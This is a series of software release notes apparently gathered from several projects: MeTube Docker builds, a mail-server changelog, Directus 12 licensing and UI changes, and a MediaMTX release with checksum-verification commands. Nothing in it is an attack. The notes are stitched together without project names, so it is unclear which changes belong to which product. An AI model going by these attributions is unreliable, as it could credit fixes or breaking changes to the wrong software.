Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.06.16

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.06.16

Changes

• upgrade dependencies (b73e95f)
• fix empty PUBLIC_HOST_AUDIO_URL handling (closes #1010) (64d0d62)
• fix batch download (closes #1008) (37f7af0)
• review fixes (5aa7d03)

[0.16.9] - 2026-06-15

If you are upgrading from v0.16.x, replace the binary (or run docker pull). If you are upgrading from v0.15.x and below, please read the upgrading documentation for more information on how to upgrade from previous versions.

Added

• ACME: Allow specifying a preferred certificate chain.

Changed

Fixed

• JMAP: */changes methods leak ids of non-shared objects (reported by @5ud0er).
• Sieve: Do not allow invalid certs in http_header function.
• FoundationDB: Fix read version cache expiration logic.
• MTA: Re-scheduling or editing a queued message reports success but persists nothing for recipients in a non-default virtual queue.
• CardDAV: Version requests included in address-data are ignored.
• ACME: Add freshness check when renewing certificates.
• Autodiscover v2: Read email address from query parameters.
• Sieve: Do not keep copies of redirected messages when keep is not specified.
• Registry: Object ids are parsed as numbers.

Check binary attestation here

Docker Images

Docker images have been built and pushed:

Docker Hub:

• alexta69/metube:latest
• alexta69/metube:2026.06.13

GitHub Container Registry:

• ghcr.io/alexta69/metube:latest
• ghcr.io/alexta69/metube:2026.06.13

Changes

• support live streams (closes #302, closes #752, closes #978) (5429200)
• upgrade dependencies (72d60ea)
• nightly release README update (a9b2e07)

✨ New Features & Improvements

• create-directus-extension
  • Added support for non-interactive mode (#27577 by @pklenovic)

🐛 Bug Fixes & Optimizations

• @directus/api
  • Fixed user count for users with conflicting direct policy and role (#27720 by @ComfortablyCoding)

📦 Published Versions

• @directus/app@16.1.1
• @directus/api@36.0.2
• create-directus-extension@12.1.0

✨ New Features & Improvements

• @directus/app
  • Added keyboard-editable date entry directly in the datetime field. The field shows its formatted value at rest and swaps to editable date segments on focus, while a calendar button still opens the picker popup. (#27693 by @robluton)
  • Added inline editing support to the JSON repeater interface. (#26863 by @bryantgillespie)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Fixed license badge spacing issue (#27713 by @robluton)
  • Fixed license modals being impossible to dismiss when shown above a route drawer (e.g. field detail pages) by keeping dialog focus traps stacked in visual order, and scoped license dismissal cookies to the whole app so dismissals persist across navigation (#27714 by @dstockton)
• @directus/api
  • Fixed revision snapshots being assigned to the wrong items during batch updates when read order differs (#27407 by @luciemdx)

📦 Published Versions

• @directus/app@16.1.0
• @directus/api@36.0.1

Fixes and improvements

General

• support using regexp groups in every part of a source URL (#5766) (#5779)
• improve anti-brute force mechanism (#5835) delay authentication failure responses by a random amount of time, use the same anti-brute force mechanism with all users.
• limit size of HTTP requests shown in debug logs (#5858)
• print body of selected HTTP responses when log level is debug (#5859)

Media-over-QUIC

• fix race condition when closing server (#5836) some sessions were hanging if they were concurrently being closed by the remote peer.
• rename moqHTTPS2Address into moqHTTP2Address, moqHTTPS3Address into moqHTTP3Address (#5841)

RTSP

• support PROXY protocol (#5754) Support PROXY protocol v1/v2 on RTMP, RTMPS, RTSP, and RTSPS TCP listeners so real client IPs are visible when running behind L4 proxies (nginx stream, HAProxy, AWS NLB).
• restore support for H264 packetization-mode 0 (#5846) (#5857) H264 streams with packetization-mode=0 cannot be routed with UDP since packets are too big. Inbound streams with packetization-mode=0 are blocked by the server since v1.19.0 but this caused compatibility issues with some cameras. The server is now able to receive such streams with TCP, and automatically remuxes them in streams with packetization-mode=1, which can be routed freely.

RTMP

• support PROXY protocol (#5754) Support PROXY protocol v1/v2 on RTMP, RTMPS, RTSP, and RTSPS TCP listeners so real client IPs are visible when running behind L4 proxies (nginx stream, HAProxy, AWS NLB).

Dependencies

• code.cloudfoundry.org/bytefmt updated from v0.74.0 to v0.76.0
• github.com/bluenviron/gortsplib/v5 updated from v5.5.4 to v5.6.0
• github.com/pion/ice/v4 updated from v4.2.7 to v4.2.8-0.20260604162030-72f5001c4596
• github.com/pion/webrtc/v4 updated from v4.2.14 to v4.2.15
• github.com/quic-go/quic-go updated from v0.59.0 to v0.60.0
• golang.org/x/crypto updated from v0.52.0 to v0.53.0
• golang.org/x/net updated from v0.55.0 to v0.56.0
• golang.org/x/sync updated from v0.20.0 to v0.21.0
• golang.org/x/sys updated from v0.45.0 to v0.46.0
• golang.org/x/term updated from v0.43.0 to v0.44.0
• github.com/pion/dtls/v3 updated from v3.1.3 to v3.1.4
• github.com/pion/stun/v3 updated from v3.1.4 to v3.1.5
• github.com/pion/turn/v5 updated from v5.0.7 to v5.0.9
• golang.org/x/text updated from v0.37.0 to v0.38.0
• github.com/pires/go-proxyproto v0.12.0 added

Security

Binaries are compiled from source code by the Release workflow, which is a fully-visible process that prevents any change or external interference in produced artifacts.

Checksums of binaries are also published in a public blockchain by using GitHub Attestations, and they can be verified by running:

ls mediamtx_* | xargs -L1 gh attestation verify --repo bluenviron/mediamtx

You can verify checksums of binaries by downloading checksums.sha256 and running:

cat checksums.sha256 | grep "$(ls mediamtx_*)" | sha256sum --check

License Enforcement

Directus 12 introduces active license enforcement. Self-hosted instances run on the Core tier by default. Higher limits and additional features require a valid license. See Licensing for a complete overview.

This change affects instances previously using features that now require a license, including:

• SSO — SSO login will no longer work. Users who authenticate through SSO will be unable to log in and must be converted to email and password users to regain access.
• Custom permission rules — custom rules on access policies will be ignored.
• Custom or self-hosted LLMs — connections to custom LLMs will no longer work.
• AI Translations — AI-powered translations are not available.

Enforcement is immediate on new instances. Instances upgrading to Directus 12 get a 30-day grace period from the time of upgrade, after which these are enforced unless a license that enables them is configured.

If your instance uses any of these features, add a license that includes them to continue to do so. If your instance uses only Core tier features, no action is required.

Changed license to MSCL-1.0-GPL (#27417)

• Breaking Change: Relicensed from BUSL-1.1 to MSCL-1.0-GPL (Monospace Sustainable Core License, Version 1.0).

Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607)

• The IP_TRUST_PROXY default was changed from true to false. If you run Directus behind a reverse proxy and rely on X-Forwarded-For (or similar) headers for client IP resolution, you must now explicitly set IP_TRUST_PROXY to true or a more specific trust configuration.

Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160)

• Health checks are cached by default and shared across multi-instance deployments
  • /server/health will return 404 for unauthenticated requests, use /server/ping for liveness checks
  • cache, rateLimiter and rateLimiterGlobal health checks have been replaced by a generic redis check using the redis: prefix

Introduced VERSION_KEY_ constants and renamed main to published @alvarosabu (#27397)*

• Backward Compatibility: You can now use ?version=published to resolve versions of the main item(s) via the version query parameter. For backward compatibility, ?version=main will continue to work.

Replaced status field with archived boolean in collection settings @alvarosabu (#27397)

• Backward Compatibility: Existing collections with string-based status fields continue to work unchanged; newly created collections now default to a boolean "Archived" field instead of the string "Status" field

Deprecated the VResizeable component @formfcw (#27437)

• Deprecation for extensions: The globally registered VResizeable component has been deprecated. Extension authors using <v-resizeable> should migrate to @directus/vue-split-panel or their own implementation.

Updated type system, borders, and theme variables @formfcw (#27437)

• Potential breaking change for theme extensions: headerShadow and sidebarShadow removed from LayoutConfig interface
• Potential breaking change for theme extensions: boxShadow removed from header theme rules schema
• Potential breaking change for theme extensions: sidebarShadow no longer exposed in layout wrapper state

Updated module navigation bar spacing and styling @HZooly (#27437)

• Potential breaking change in theme extensions: Removed navigation.project.borderColor / navigation.project.borderWidth / navigation.project.background from theming. No action is required — these props will simply no longer have any effect.

Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397)

• Breaking change — new behavior for versioned collections Published items in versioned collections are now locked. Edits must be made through the draft version.

Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437)

• Potential breaking change for extensions: The rounded prop has been removed from v-button. Extensions using rounded will still render correctly but buttons will appear as rounded rectangles instead of circles. No functional impact.

Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437)

• Potential breaking change for theme extensions: The theme properties navigation.background, navigation.backgroundAccent, navigation.borderWidth, navigation.borderColor, header.background, header.borderWidth, and header.borderColor have been removed and replaced by shell.background, shell.backgroundAccent, shell.borderWidth, and shell.borderColor.
• Potential breaking change for theme extensions: Custom themes overriding any of these removed properties must migrate to the new shell scope. The corresponding CSS variables change from --theme--navigation--background, --theme--navigation--background-accent, --theme--navigation--border-*, --theme--header--background, and --theme--header--border-* to --theme--shell--background, --theme--shell--background-accent, and --theme--shell--border-*.

Removed the extra confirmation step from the publish flow @alvarosabu (#27487)

• Breaking change — new publish flow: Publishing a version no longer shows an additional confirmation dialog after confirming changes in the comparison modal. The item is published directly once the changes are confirmed.

Updated sidebar styles @formfcw (#27437)

• Potential breaking change for theme extensions: Removed section.toggle.borderWidth / section.toggle.borderColor in favor of section-level border tokens. No action is required — these props will simply no longer have any effect.
• Potential breaking change for theme extensions: Removed sidebarShadow and headerShadow from defineLayout(). No action is required — these props will simply no longer have any effect.

Refactored focus ring from border/box-shadow to outline @formfcw (#27437)

• Potential breaking change for theme extensions: borderColorFocus, boxShadowHover, and boxShadowFocus are removed from the theme schema — custom themes referencing these will lose their focus overrides silently
• Potential breaking change for interface extensions that relied on --theme--form--field--input--border-color-focus or --theme--form--field--input--box-shadow-focus CSS variables will need to migrate to --theme--form--field--input--focus-ring-color

Updated header bar elements and deprecated the headline slot @formfcw (#27437)

• Deprecation for extensions: The headline slot on the private view header bar has been deprecated. Existing content keeps rendering, but consumers using <template #headline> will now see a deprecation hint from Volar.

• @directus/app

  • Locked published items in versioned collections from editing and added a header action button to edit in the draft version @alvarosabu (#27397 by @formfcw)
  • Removed rounded buttons and adopted shared header action button across all views @formfcw (#27437 by @formfcw)
  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)
  • Removed the extra confirmation step from the publish flow @alvarosabu (#27487 by @alvarosabu)

• @directus/api

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)
  • Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160 by @ComfortablyCoding)

• @directus/themes

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

• @directus/types

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated header and navigation bar base design and merged their theme properties into a new shell scope @formfcw (#27437 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

• @directus/extensions

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/extensions-registry

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/extensions-sdk

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/format-title

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/memory

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/pressure

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/release-notes-generator

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/update-check

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/validation

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/schema

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/schema-builder

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/specs

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/storage

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/storage-driver-cloudinary

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/storage-driver-supabase

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/storage-driver-azure

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/storage-driver-gcs

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/storage-driver-local

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/storage-driver-s3

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/stores

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• create-directus-extension

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• create-directus-project

  • Changed license to MSCL-1.0-GPL (#27417 by @ComfortablyCoding)

• @directus/env

  • Changed the default of IP_TRUST_PROXY from true to false to harden the default deployment against IP spoofing. (#27607 by @br41nslug)

• @directus/sdk

  • Fixed the outdated updateExtension command and added missing deleteExtension and extension registry commands (#27314 by @kheiner)

    ::notice

    • updateExtension now accepts an id instead of bundle and name
      :::

  • Refactor sdk error to use class over object (#27417 by @ComfortablyCoding)

    :::warning
    Requests that fail will now throw a RequestError instead of returning a response with an error property.
    :::

✨ New Features & Improvements

• @directus/app

  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)

  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)

  • Fixed Image Editor save button to use split button @HZooly (#27437 by @formfcw)

  • Added split-menu slot to v-button and migrate primary header actions @formfcw (#27437 by @formfcw)

  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)

  • Added version support to getItemRoute and update all callers to preserve version context when navigating to items from layouts and interfaces @alvarosabu (#27397 by @formfcw)

  • Added behavior to auto-switch to the draft version on the first edit of published item @alvarosabu (#27507 by @alvarosabu)

  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)

  • Updated Visual Editor header bar buttons @formfcw (#27437 by @formfcw)

  • Updated content route middleware to handle singleton collections and draft flow via route guards @alvarosabu (#27397 by @formfcw)

  • Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)

  • Updated module bar buttons style @HZooly (#27437 by @formfcw)

  • Deprecated the VResizeable component @formfcw (#27437 by @formfcw)

  • Updated VChip component to appear as a pill in form field label, group accordion, group tabs, kanban, deployment status, extension item, marketplace extension list item, marketplace extension banner, and user popover @formfcw (#27462 by @formfcw)

  • Added tresjs shader background for public pages @alvarosabu (#27428 by @alvarosabu)

  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)

  • Rendered non-clickable version menu without directus_versions read access @alvarosabu (#27461 by @alvarosabu)

  • Added item-less draft creation flow for versioned collections @alvarosabu (#27397 by @formfcw)

  • Updated module navigation bar spacing and styling @HZooly (#27437 by @formfcw)

  • Updated Visual Editor popover/modal action buttons @formfcw (#27437 by @formfcw)

  • Updated UI for the Draft & Publish workflow @formfcw (#27437 by @formfcw)

  • Updated mobile appearance of drawer sidebar @formfcw (#27437 by @formfcw)

  • Moved Promote/Publish button to header actions @alvarosabu (#27397 by @formfcw)

  • Updated primary header actions to show label and replace outlined header action buttons @formfcw (#27437 by @formfcw)

  • Updated SearchInput component to match the new design @formfcw (#27437 by @formfcw)

  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)

  • Refactored header bar action slots and reorganized CTAs @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The actions:append slot in the header bar has been deprecated in favor of the new actions:primary slot for primary CTAs. Existing actions:append usage keeps rendering in the secondary-actions zone, but consumers will now see a deprecation hint from Volar.

    :::

  • Added navigation logic on discarding item-less versions @alvarosabu (#27397 by @formfcw)

  • Put the sidebar into the content area @HZooly (#27437 by @formfcw)

  • Updated color system for VChip and VersionMenu components @formfcw (#27437 by @formfcw)

  • Updated content section spacing and drawer content spacing @HZooly (#27437 by @formfcw)

  • Extracted the card subheader into a reusable subheader component @HZooly (#27437 by @formfcw)

  • Added version select to collection page @alvarosabu (#27397 by @formfcw)

  • Updated sidebar styles @formfcw (#27437 by @formfcw)

  • Renamed "Promote" to "Publish" in version menu and disabled create version and published selection for item-less versions @alvarosabu (#27397 by @formfcw)

  • Added version query param guards on content-item route @alvarosabu (#27397 by @formfcw)

  • Improved bookmark flow @formfcw (#27450 by @formfcw)

  • Forwarded theme tokens and i18n strings from Studio to the visual-editing iframe @formfcw (#27469 by @formfcw)

  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)

  • Introduced VersionChip component @formfcw (#27437 by @formfcw)

  • Updated theme preview component to match the new design @formfcw (#27437 by @formfcw)

  • Updated collab avatar indicator design @formfcw (#27437 by @formfcw)

  • Refactored drawer header layout and simplified v-drawer API @formfcw (#27437 by @formfcw)

    :::notice

    • Deprecation for extensions: The globally registered v-breadcrumb component has been deprecated. Extensions using <v-breadcrumb> keep rendering but will see a deprecation hint from Volar.
    • Deprecation for extensions: On v-drawer, the subtitle prop (use the title prop instead), the subtitle slot, the header:append slot, and the actions:append slot have been deprecated. Existing usage keeps rendering — actions:append content lands in the secondary-actions zone, and for primary CTAs in the drawer header use the new actions:primary slot. Consumers will see deprecation hints from Volar.
    • Potential Breaking change for theme extensions: The theme properties header.headline.foreground and header.headline.fontFamily have been removed. Custom themes overriding these properties should remove them. The corresponding CSS variables --theme--header--headline--foreground and --theme--header--headline--font-family no longer exist.

    :::

  • Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)

  • Ensured to switch to the draft version when visually editing an item of a versioned collection @formfcw (#27595 by @formfcw)

  • Extracted reusable ModuleBarButton component @formfcw (#27437 by @formfcw)

  • Moved client-validation to promote version workflow instead of save version @alvarosabu (#27397 by @formfcw)

  • Added Create New action to publish split menu with shortcut @alvarosabu (#27425 by @alvarosabu)

• @directus/api
  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
  • Allow disabling the health check endpoint via HEALTHCHECK_ENABLED or selectively disabled checked services via HEALTHCHECK_SERVICES (#27160 by @ComfortablyCoding)
  • Improved AI assistant prompt caching support across providers. (#27545 by @bryantgillespie)
• @directus/constants
  • Introduced VERSION_KEY_* constants and renamed main to published @alvarosabu (#27397 by @formfcw)
• @directus/env
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Allow disabling the health check endpoint via HEALTHCHECK_ENABLED or selectively disabled checked services via HEALTHCHECK_SERVICES (#27160 by @ComfortablyCoding)
• @directus/system-data
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Replaced status field with archived boolean in collection settings @alvarosabu (#27397 by @formfcw)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Updated directus_oauth_* system collection visibility to match other system collections (#27682 by @hanneskuettner)
• @directus/types
  • Added auto-save for version editing @alvarosabu (#27449 by @alvarosabu)
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
  • Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160 by @ComfortablyCoding)
• @directus/errors
  • Added Publish without Review action to the publish split menu with shortcut @alvarosabu (#27501 by @alvarosabu)
• @directus/composables
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Added version select to collection page @alvarosabu (#27397 by @formfcw)
• @directus/themes
  • Updated type system, borders, and theme variables @formfcw (#27437 by @formfcw)
  • Refactored focus ring from border/box-shadow to outline @formfcw (#27437 by @formfcw)
  • Updated header bar elements and deprecated the headline slot @formfcw (#27437 by @formfcw)
• @directus/utils
  • Added MCP OAuth 2.1 authorization server. MCP clients (like Claude, Codex) can now authenticate via standard OAuth flow with PKCE instead of requiring a manually provisioned static token. Enable with MCP_OAUTH_ENABLED=true. Dynamic and client ID metadata registration were kept separately opt-in with MCP_OAUTH_DCR_ENABLED=true and MCP_OAUTH_CIMD_ENABLED=true. (#27069 by @hanneskuettner)
• @directus/sdk
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
  • Added support for item-less versions @Nitwel (#27397 by @formfcw)
• @directus/specs
  • Added support for the version query parameter in collections @Nitwel (#27397 by @formfcw)
• @directus/visual-editing
  • Redesigned the editable-element overlay with theming, RTL support and improved a11y @formfcw (#27469 by @formfcw)
• @directus/memory
  • Added TTL support for local KV and cache stores (#27160 by @ComfortablyCoding)

🐛 Bug Fixes & Optimizations

• @directus/app
  • Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
  • Consolidated URLs and emails into shared constants (#27641 by @HZooly)
  • Limited mobile sidebar width so the overlay can be tapped to close it @HZooly (#27437 by @formfcw)
  • Bumped vue-tsc to 3.1.8 (#27437 by @formfcw)
  • Fixed tick rendering when count exceeds display limit in v-slider (#27644 by @HZooly)
  • Fixed icon alignment in v-divider component @HZooly (#27437 by @formfcw)
  • Fixed v-dialog returning focus to opener instead of an autofocused child on close @formfcw (#27464 by @formfcw)
  • Fixed flow handle button alignment in flow editor @HZooly (#27437 by @formfcw)
  • Shown "Import in background" checkbox only when a file is selected @HZooly (#27437 by @formfcw)
  • Fixed sidebar reopening at minimum size after being collapsed via drag handle @HZooly (#27437 by @formfcw)
  • Capped datepicker year to prevent invalid date (#27659 by @HZooly)
  • Bumped Vitest to 3.2.6 (#27686 by @br41nslug)
  • Fixed EXTENSIONS_PATH and EXTENSIONS_LOCATION env vars not being respected by the Vite dev server (#27642 by @HZooly)
  • Added notice on license page with oig link (#27661 by @robluton)
  • Fixed vue console warnings related to the comparison modal (#27538 by @formfcw)
  • Fixed bug on tooltip value when decimals is 0 in pie chart panel (#27356 by @Prateet-Github)
  • Fixed misaligned filter editor in search bar @formfcw (#27454 by @formfcw)
  • Added missing collection note translations for the directus_oauth_* system collections (#27682 by @hanneskuettner)
  • Changed back button behavior, always navigates one level up @HZooly (#27437 by @formfcw)
  • Fixed default favicon path to resolve against the instance root path instead of the site origin. (#27095 by @singhvishalkr)
  • Fixed repeater interface ignoring per-field translations and $t: keys on sub-field labels, and added a "Field Name Translations" section to the sub-field configuration UI (#27374 by @khanahmad4527)
  • Fixed search input not trimming whitespace, causing queries with leading or trailing spaces to return no results (#27359 by @khanahmad4527)
  • Added minor copy change to license onboarding and license key interface (#27651 by @robluton)
  • Fixed calendar layout toolbar responsiveness @HZooly (#27437 by @formfcw)
  • Updated license request links. (#27652 by @HZooly)
  • Fixed the error handling (try-catch) when saving a field in Directus Studio. (#27486 by @baguse)
  • Fixed items not being selectable in the collection drawer when the Kanban layout is used while the parent item is opened in a version context @alvarosabu (#27427 by @alvarosabu)
  • Fixed AI assistant "Clear conversation" not canceling in-flight requests, causing them to continue running in the background (#27646 by @levgiorg)
  • Added support for translatable flow names via the existing $t: prefix and translation strings, matching the field/collection label pattern. The flow name input in the flow editor now exposes the translation picker. (#27472 by @khanahmad4527)
  • Removed unsupported json filter function from the studio (#27669 by @sourav-18)
  • Fixed bookmark icon and color not showing in header @formfcw (#27437 by @formfcw)
  • Fixed UI freeze caused by WYSIWYG interface when its non-editable state toggles @formfcw (#27515 by @formfcw)
  • Fixed project setup silently ignoring invalid license keys (#27671 by @ComfortablyCoding)
• @directus/api
  • Bumped Vitest to 3.2.6 (#27686 by @br41nslug)
  • Fixed project setup silently ignoring invalid license keys (#27671 by @ComfortablyCoding)
  • Fixed nested deep query parameters being dropped when filters use dynamic variables (#27676 by @mazen-salah)
  • Fixed bulk creation of itemless drafts always fails (#27683 by @ComfortablyCoding)
  • Fixed SSO resolver erroring when admin is not defined (#27662 by @ComfortablyCoding)
  • Fixed Postgres numeric overflow errors being misattributed to an unrelated field (#27690 by @MahinAnowar)
  • Fixed registration email verification tokens to use the configured secret fallback when SECRET is missing. (#27406 by @rijkvanzanten)
  • Bumped axios, js-cookie, samlify, systeminformation, simple-git, fast-uri dependencies (#27589 by @br41nslug)
  • Fixed MCP OAuth dynamic client registration defaults and metadata responses. (#27628 by @hanneskuettner)
  • Prevented setting a custom user provider when not entitled to SSO (#27675 by @ComfortablyCoding)
  • Fixed aliased relational fields in GraphQL queries, fragments and REST queries (#27054 by @AlexGaillard)
  • Fixed active seat processing not accounting for user/role changes (#27662 by @ComfortablyCoding)
  • Removed dead isMinimumAppPermission function (#27662 by @ComfortablyCoding)
  • Fixed failed itemless drafts being dropped from version reads when limit=-1 (#27578 by @alvarosabu)
  • Added a namespace to shares cache keys (#27707 by @br41nslug)
  • Updated IP blocking (#27606 by @br41nslug)
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
  • Fixed singletons allowing multiple itemless versions (#27532 by @formfcw)
  • Fixed issue causing duplicate admin roles on first admin creation (#27663 by @robluton)
  • Fixed non custom permissions denied irrespective of if entitled (#27662 by @ComfortablyCoding)
• @directus/constants
  • Added DIRECTUS_DOMAIN constant and replaced hardcoded directus.io to directus.com using the new constant (#27417 by @ComfortablyCoding)
  • Consolidated URLs and emails into shared constants (#27641 by @HZooly)
• @directus/system-data
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/types
  • Added AI-powered translations to the translations interface, including glossary, style guide, and configurable default model settings derived from the enabled providers and allowed models. (#26940 by @bryantgillespie)
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
• @directus/utils
  • Added JSON filtering, alias and sorting support (#26981 by @br41nslug)
• @directus/sdk
  • Fixed health check results not being shared in multi-instance settings. Restricted /server/health to authenticated users (#27160 by @ComfortablyCoding)
  • Fixed SingletonCollections incorrectly including core schema collections (#27196 by @kheiner)
• @directus/ai
  • Updated the built-in OpenAI and Anthropic AI model lists to use the latest available API models. (#27602 by @hanneskuettner)
• @directus/release-notes-generator
  • Ignored private workspace packages when generating release notes (#27637 by @licitdev)

📦 Published Versions

• @directus/app@16.0.0
• @directus/api@36.0.0
• @directus/ai@1.3.2
• @directus/composables@11.5.0
• @directus/constants@14.4.0
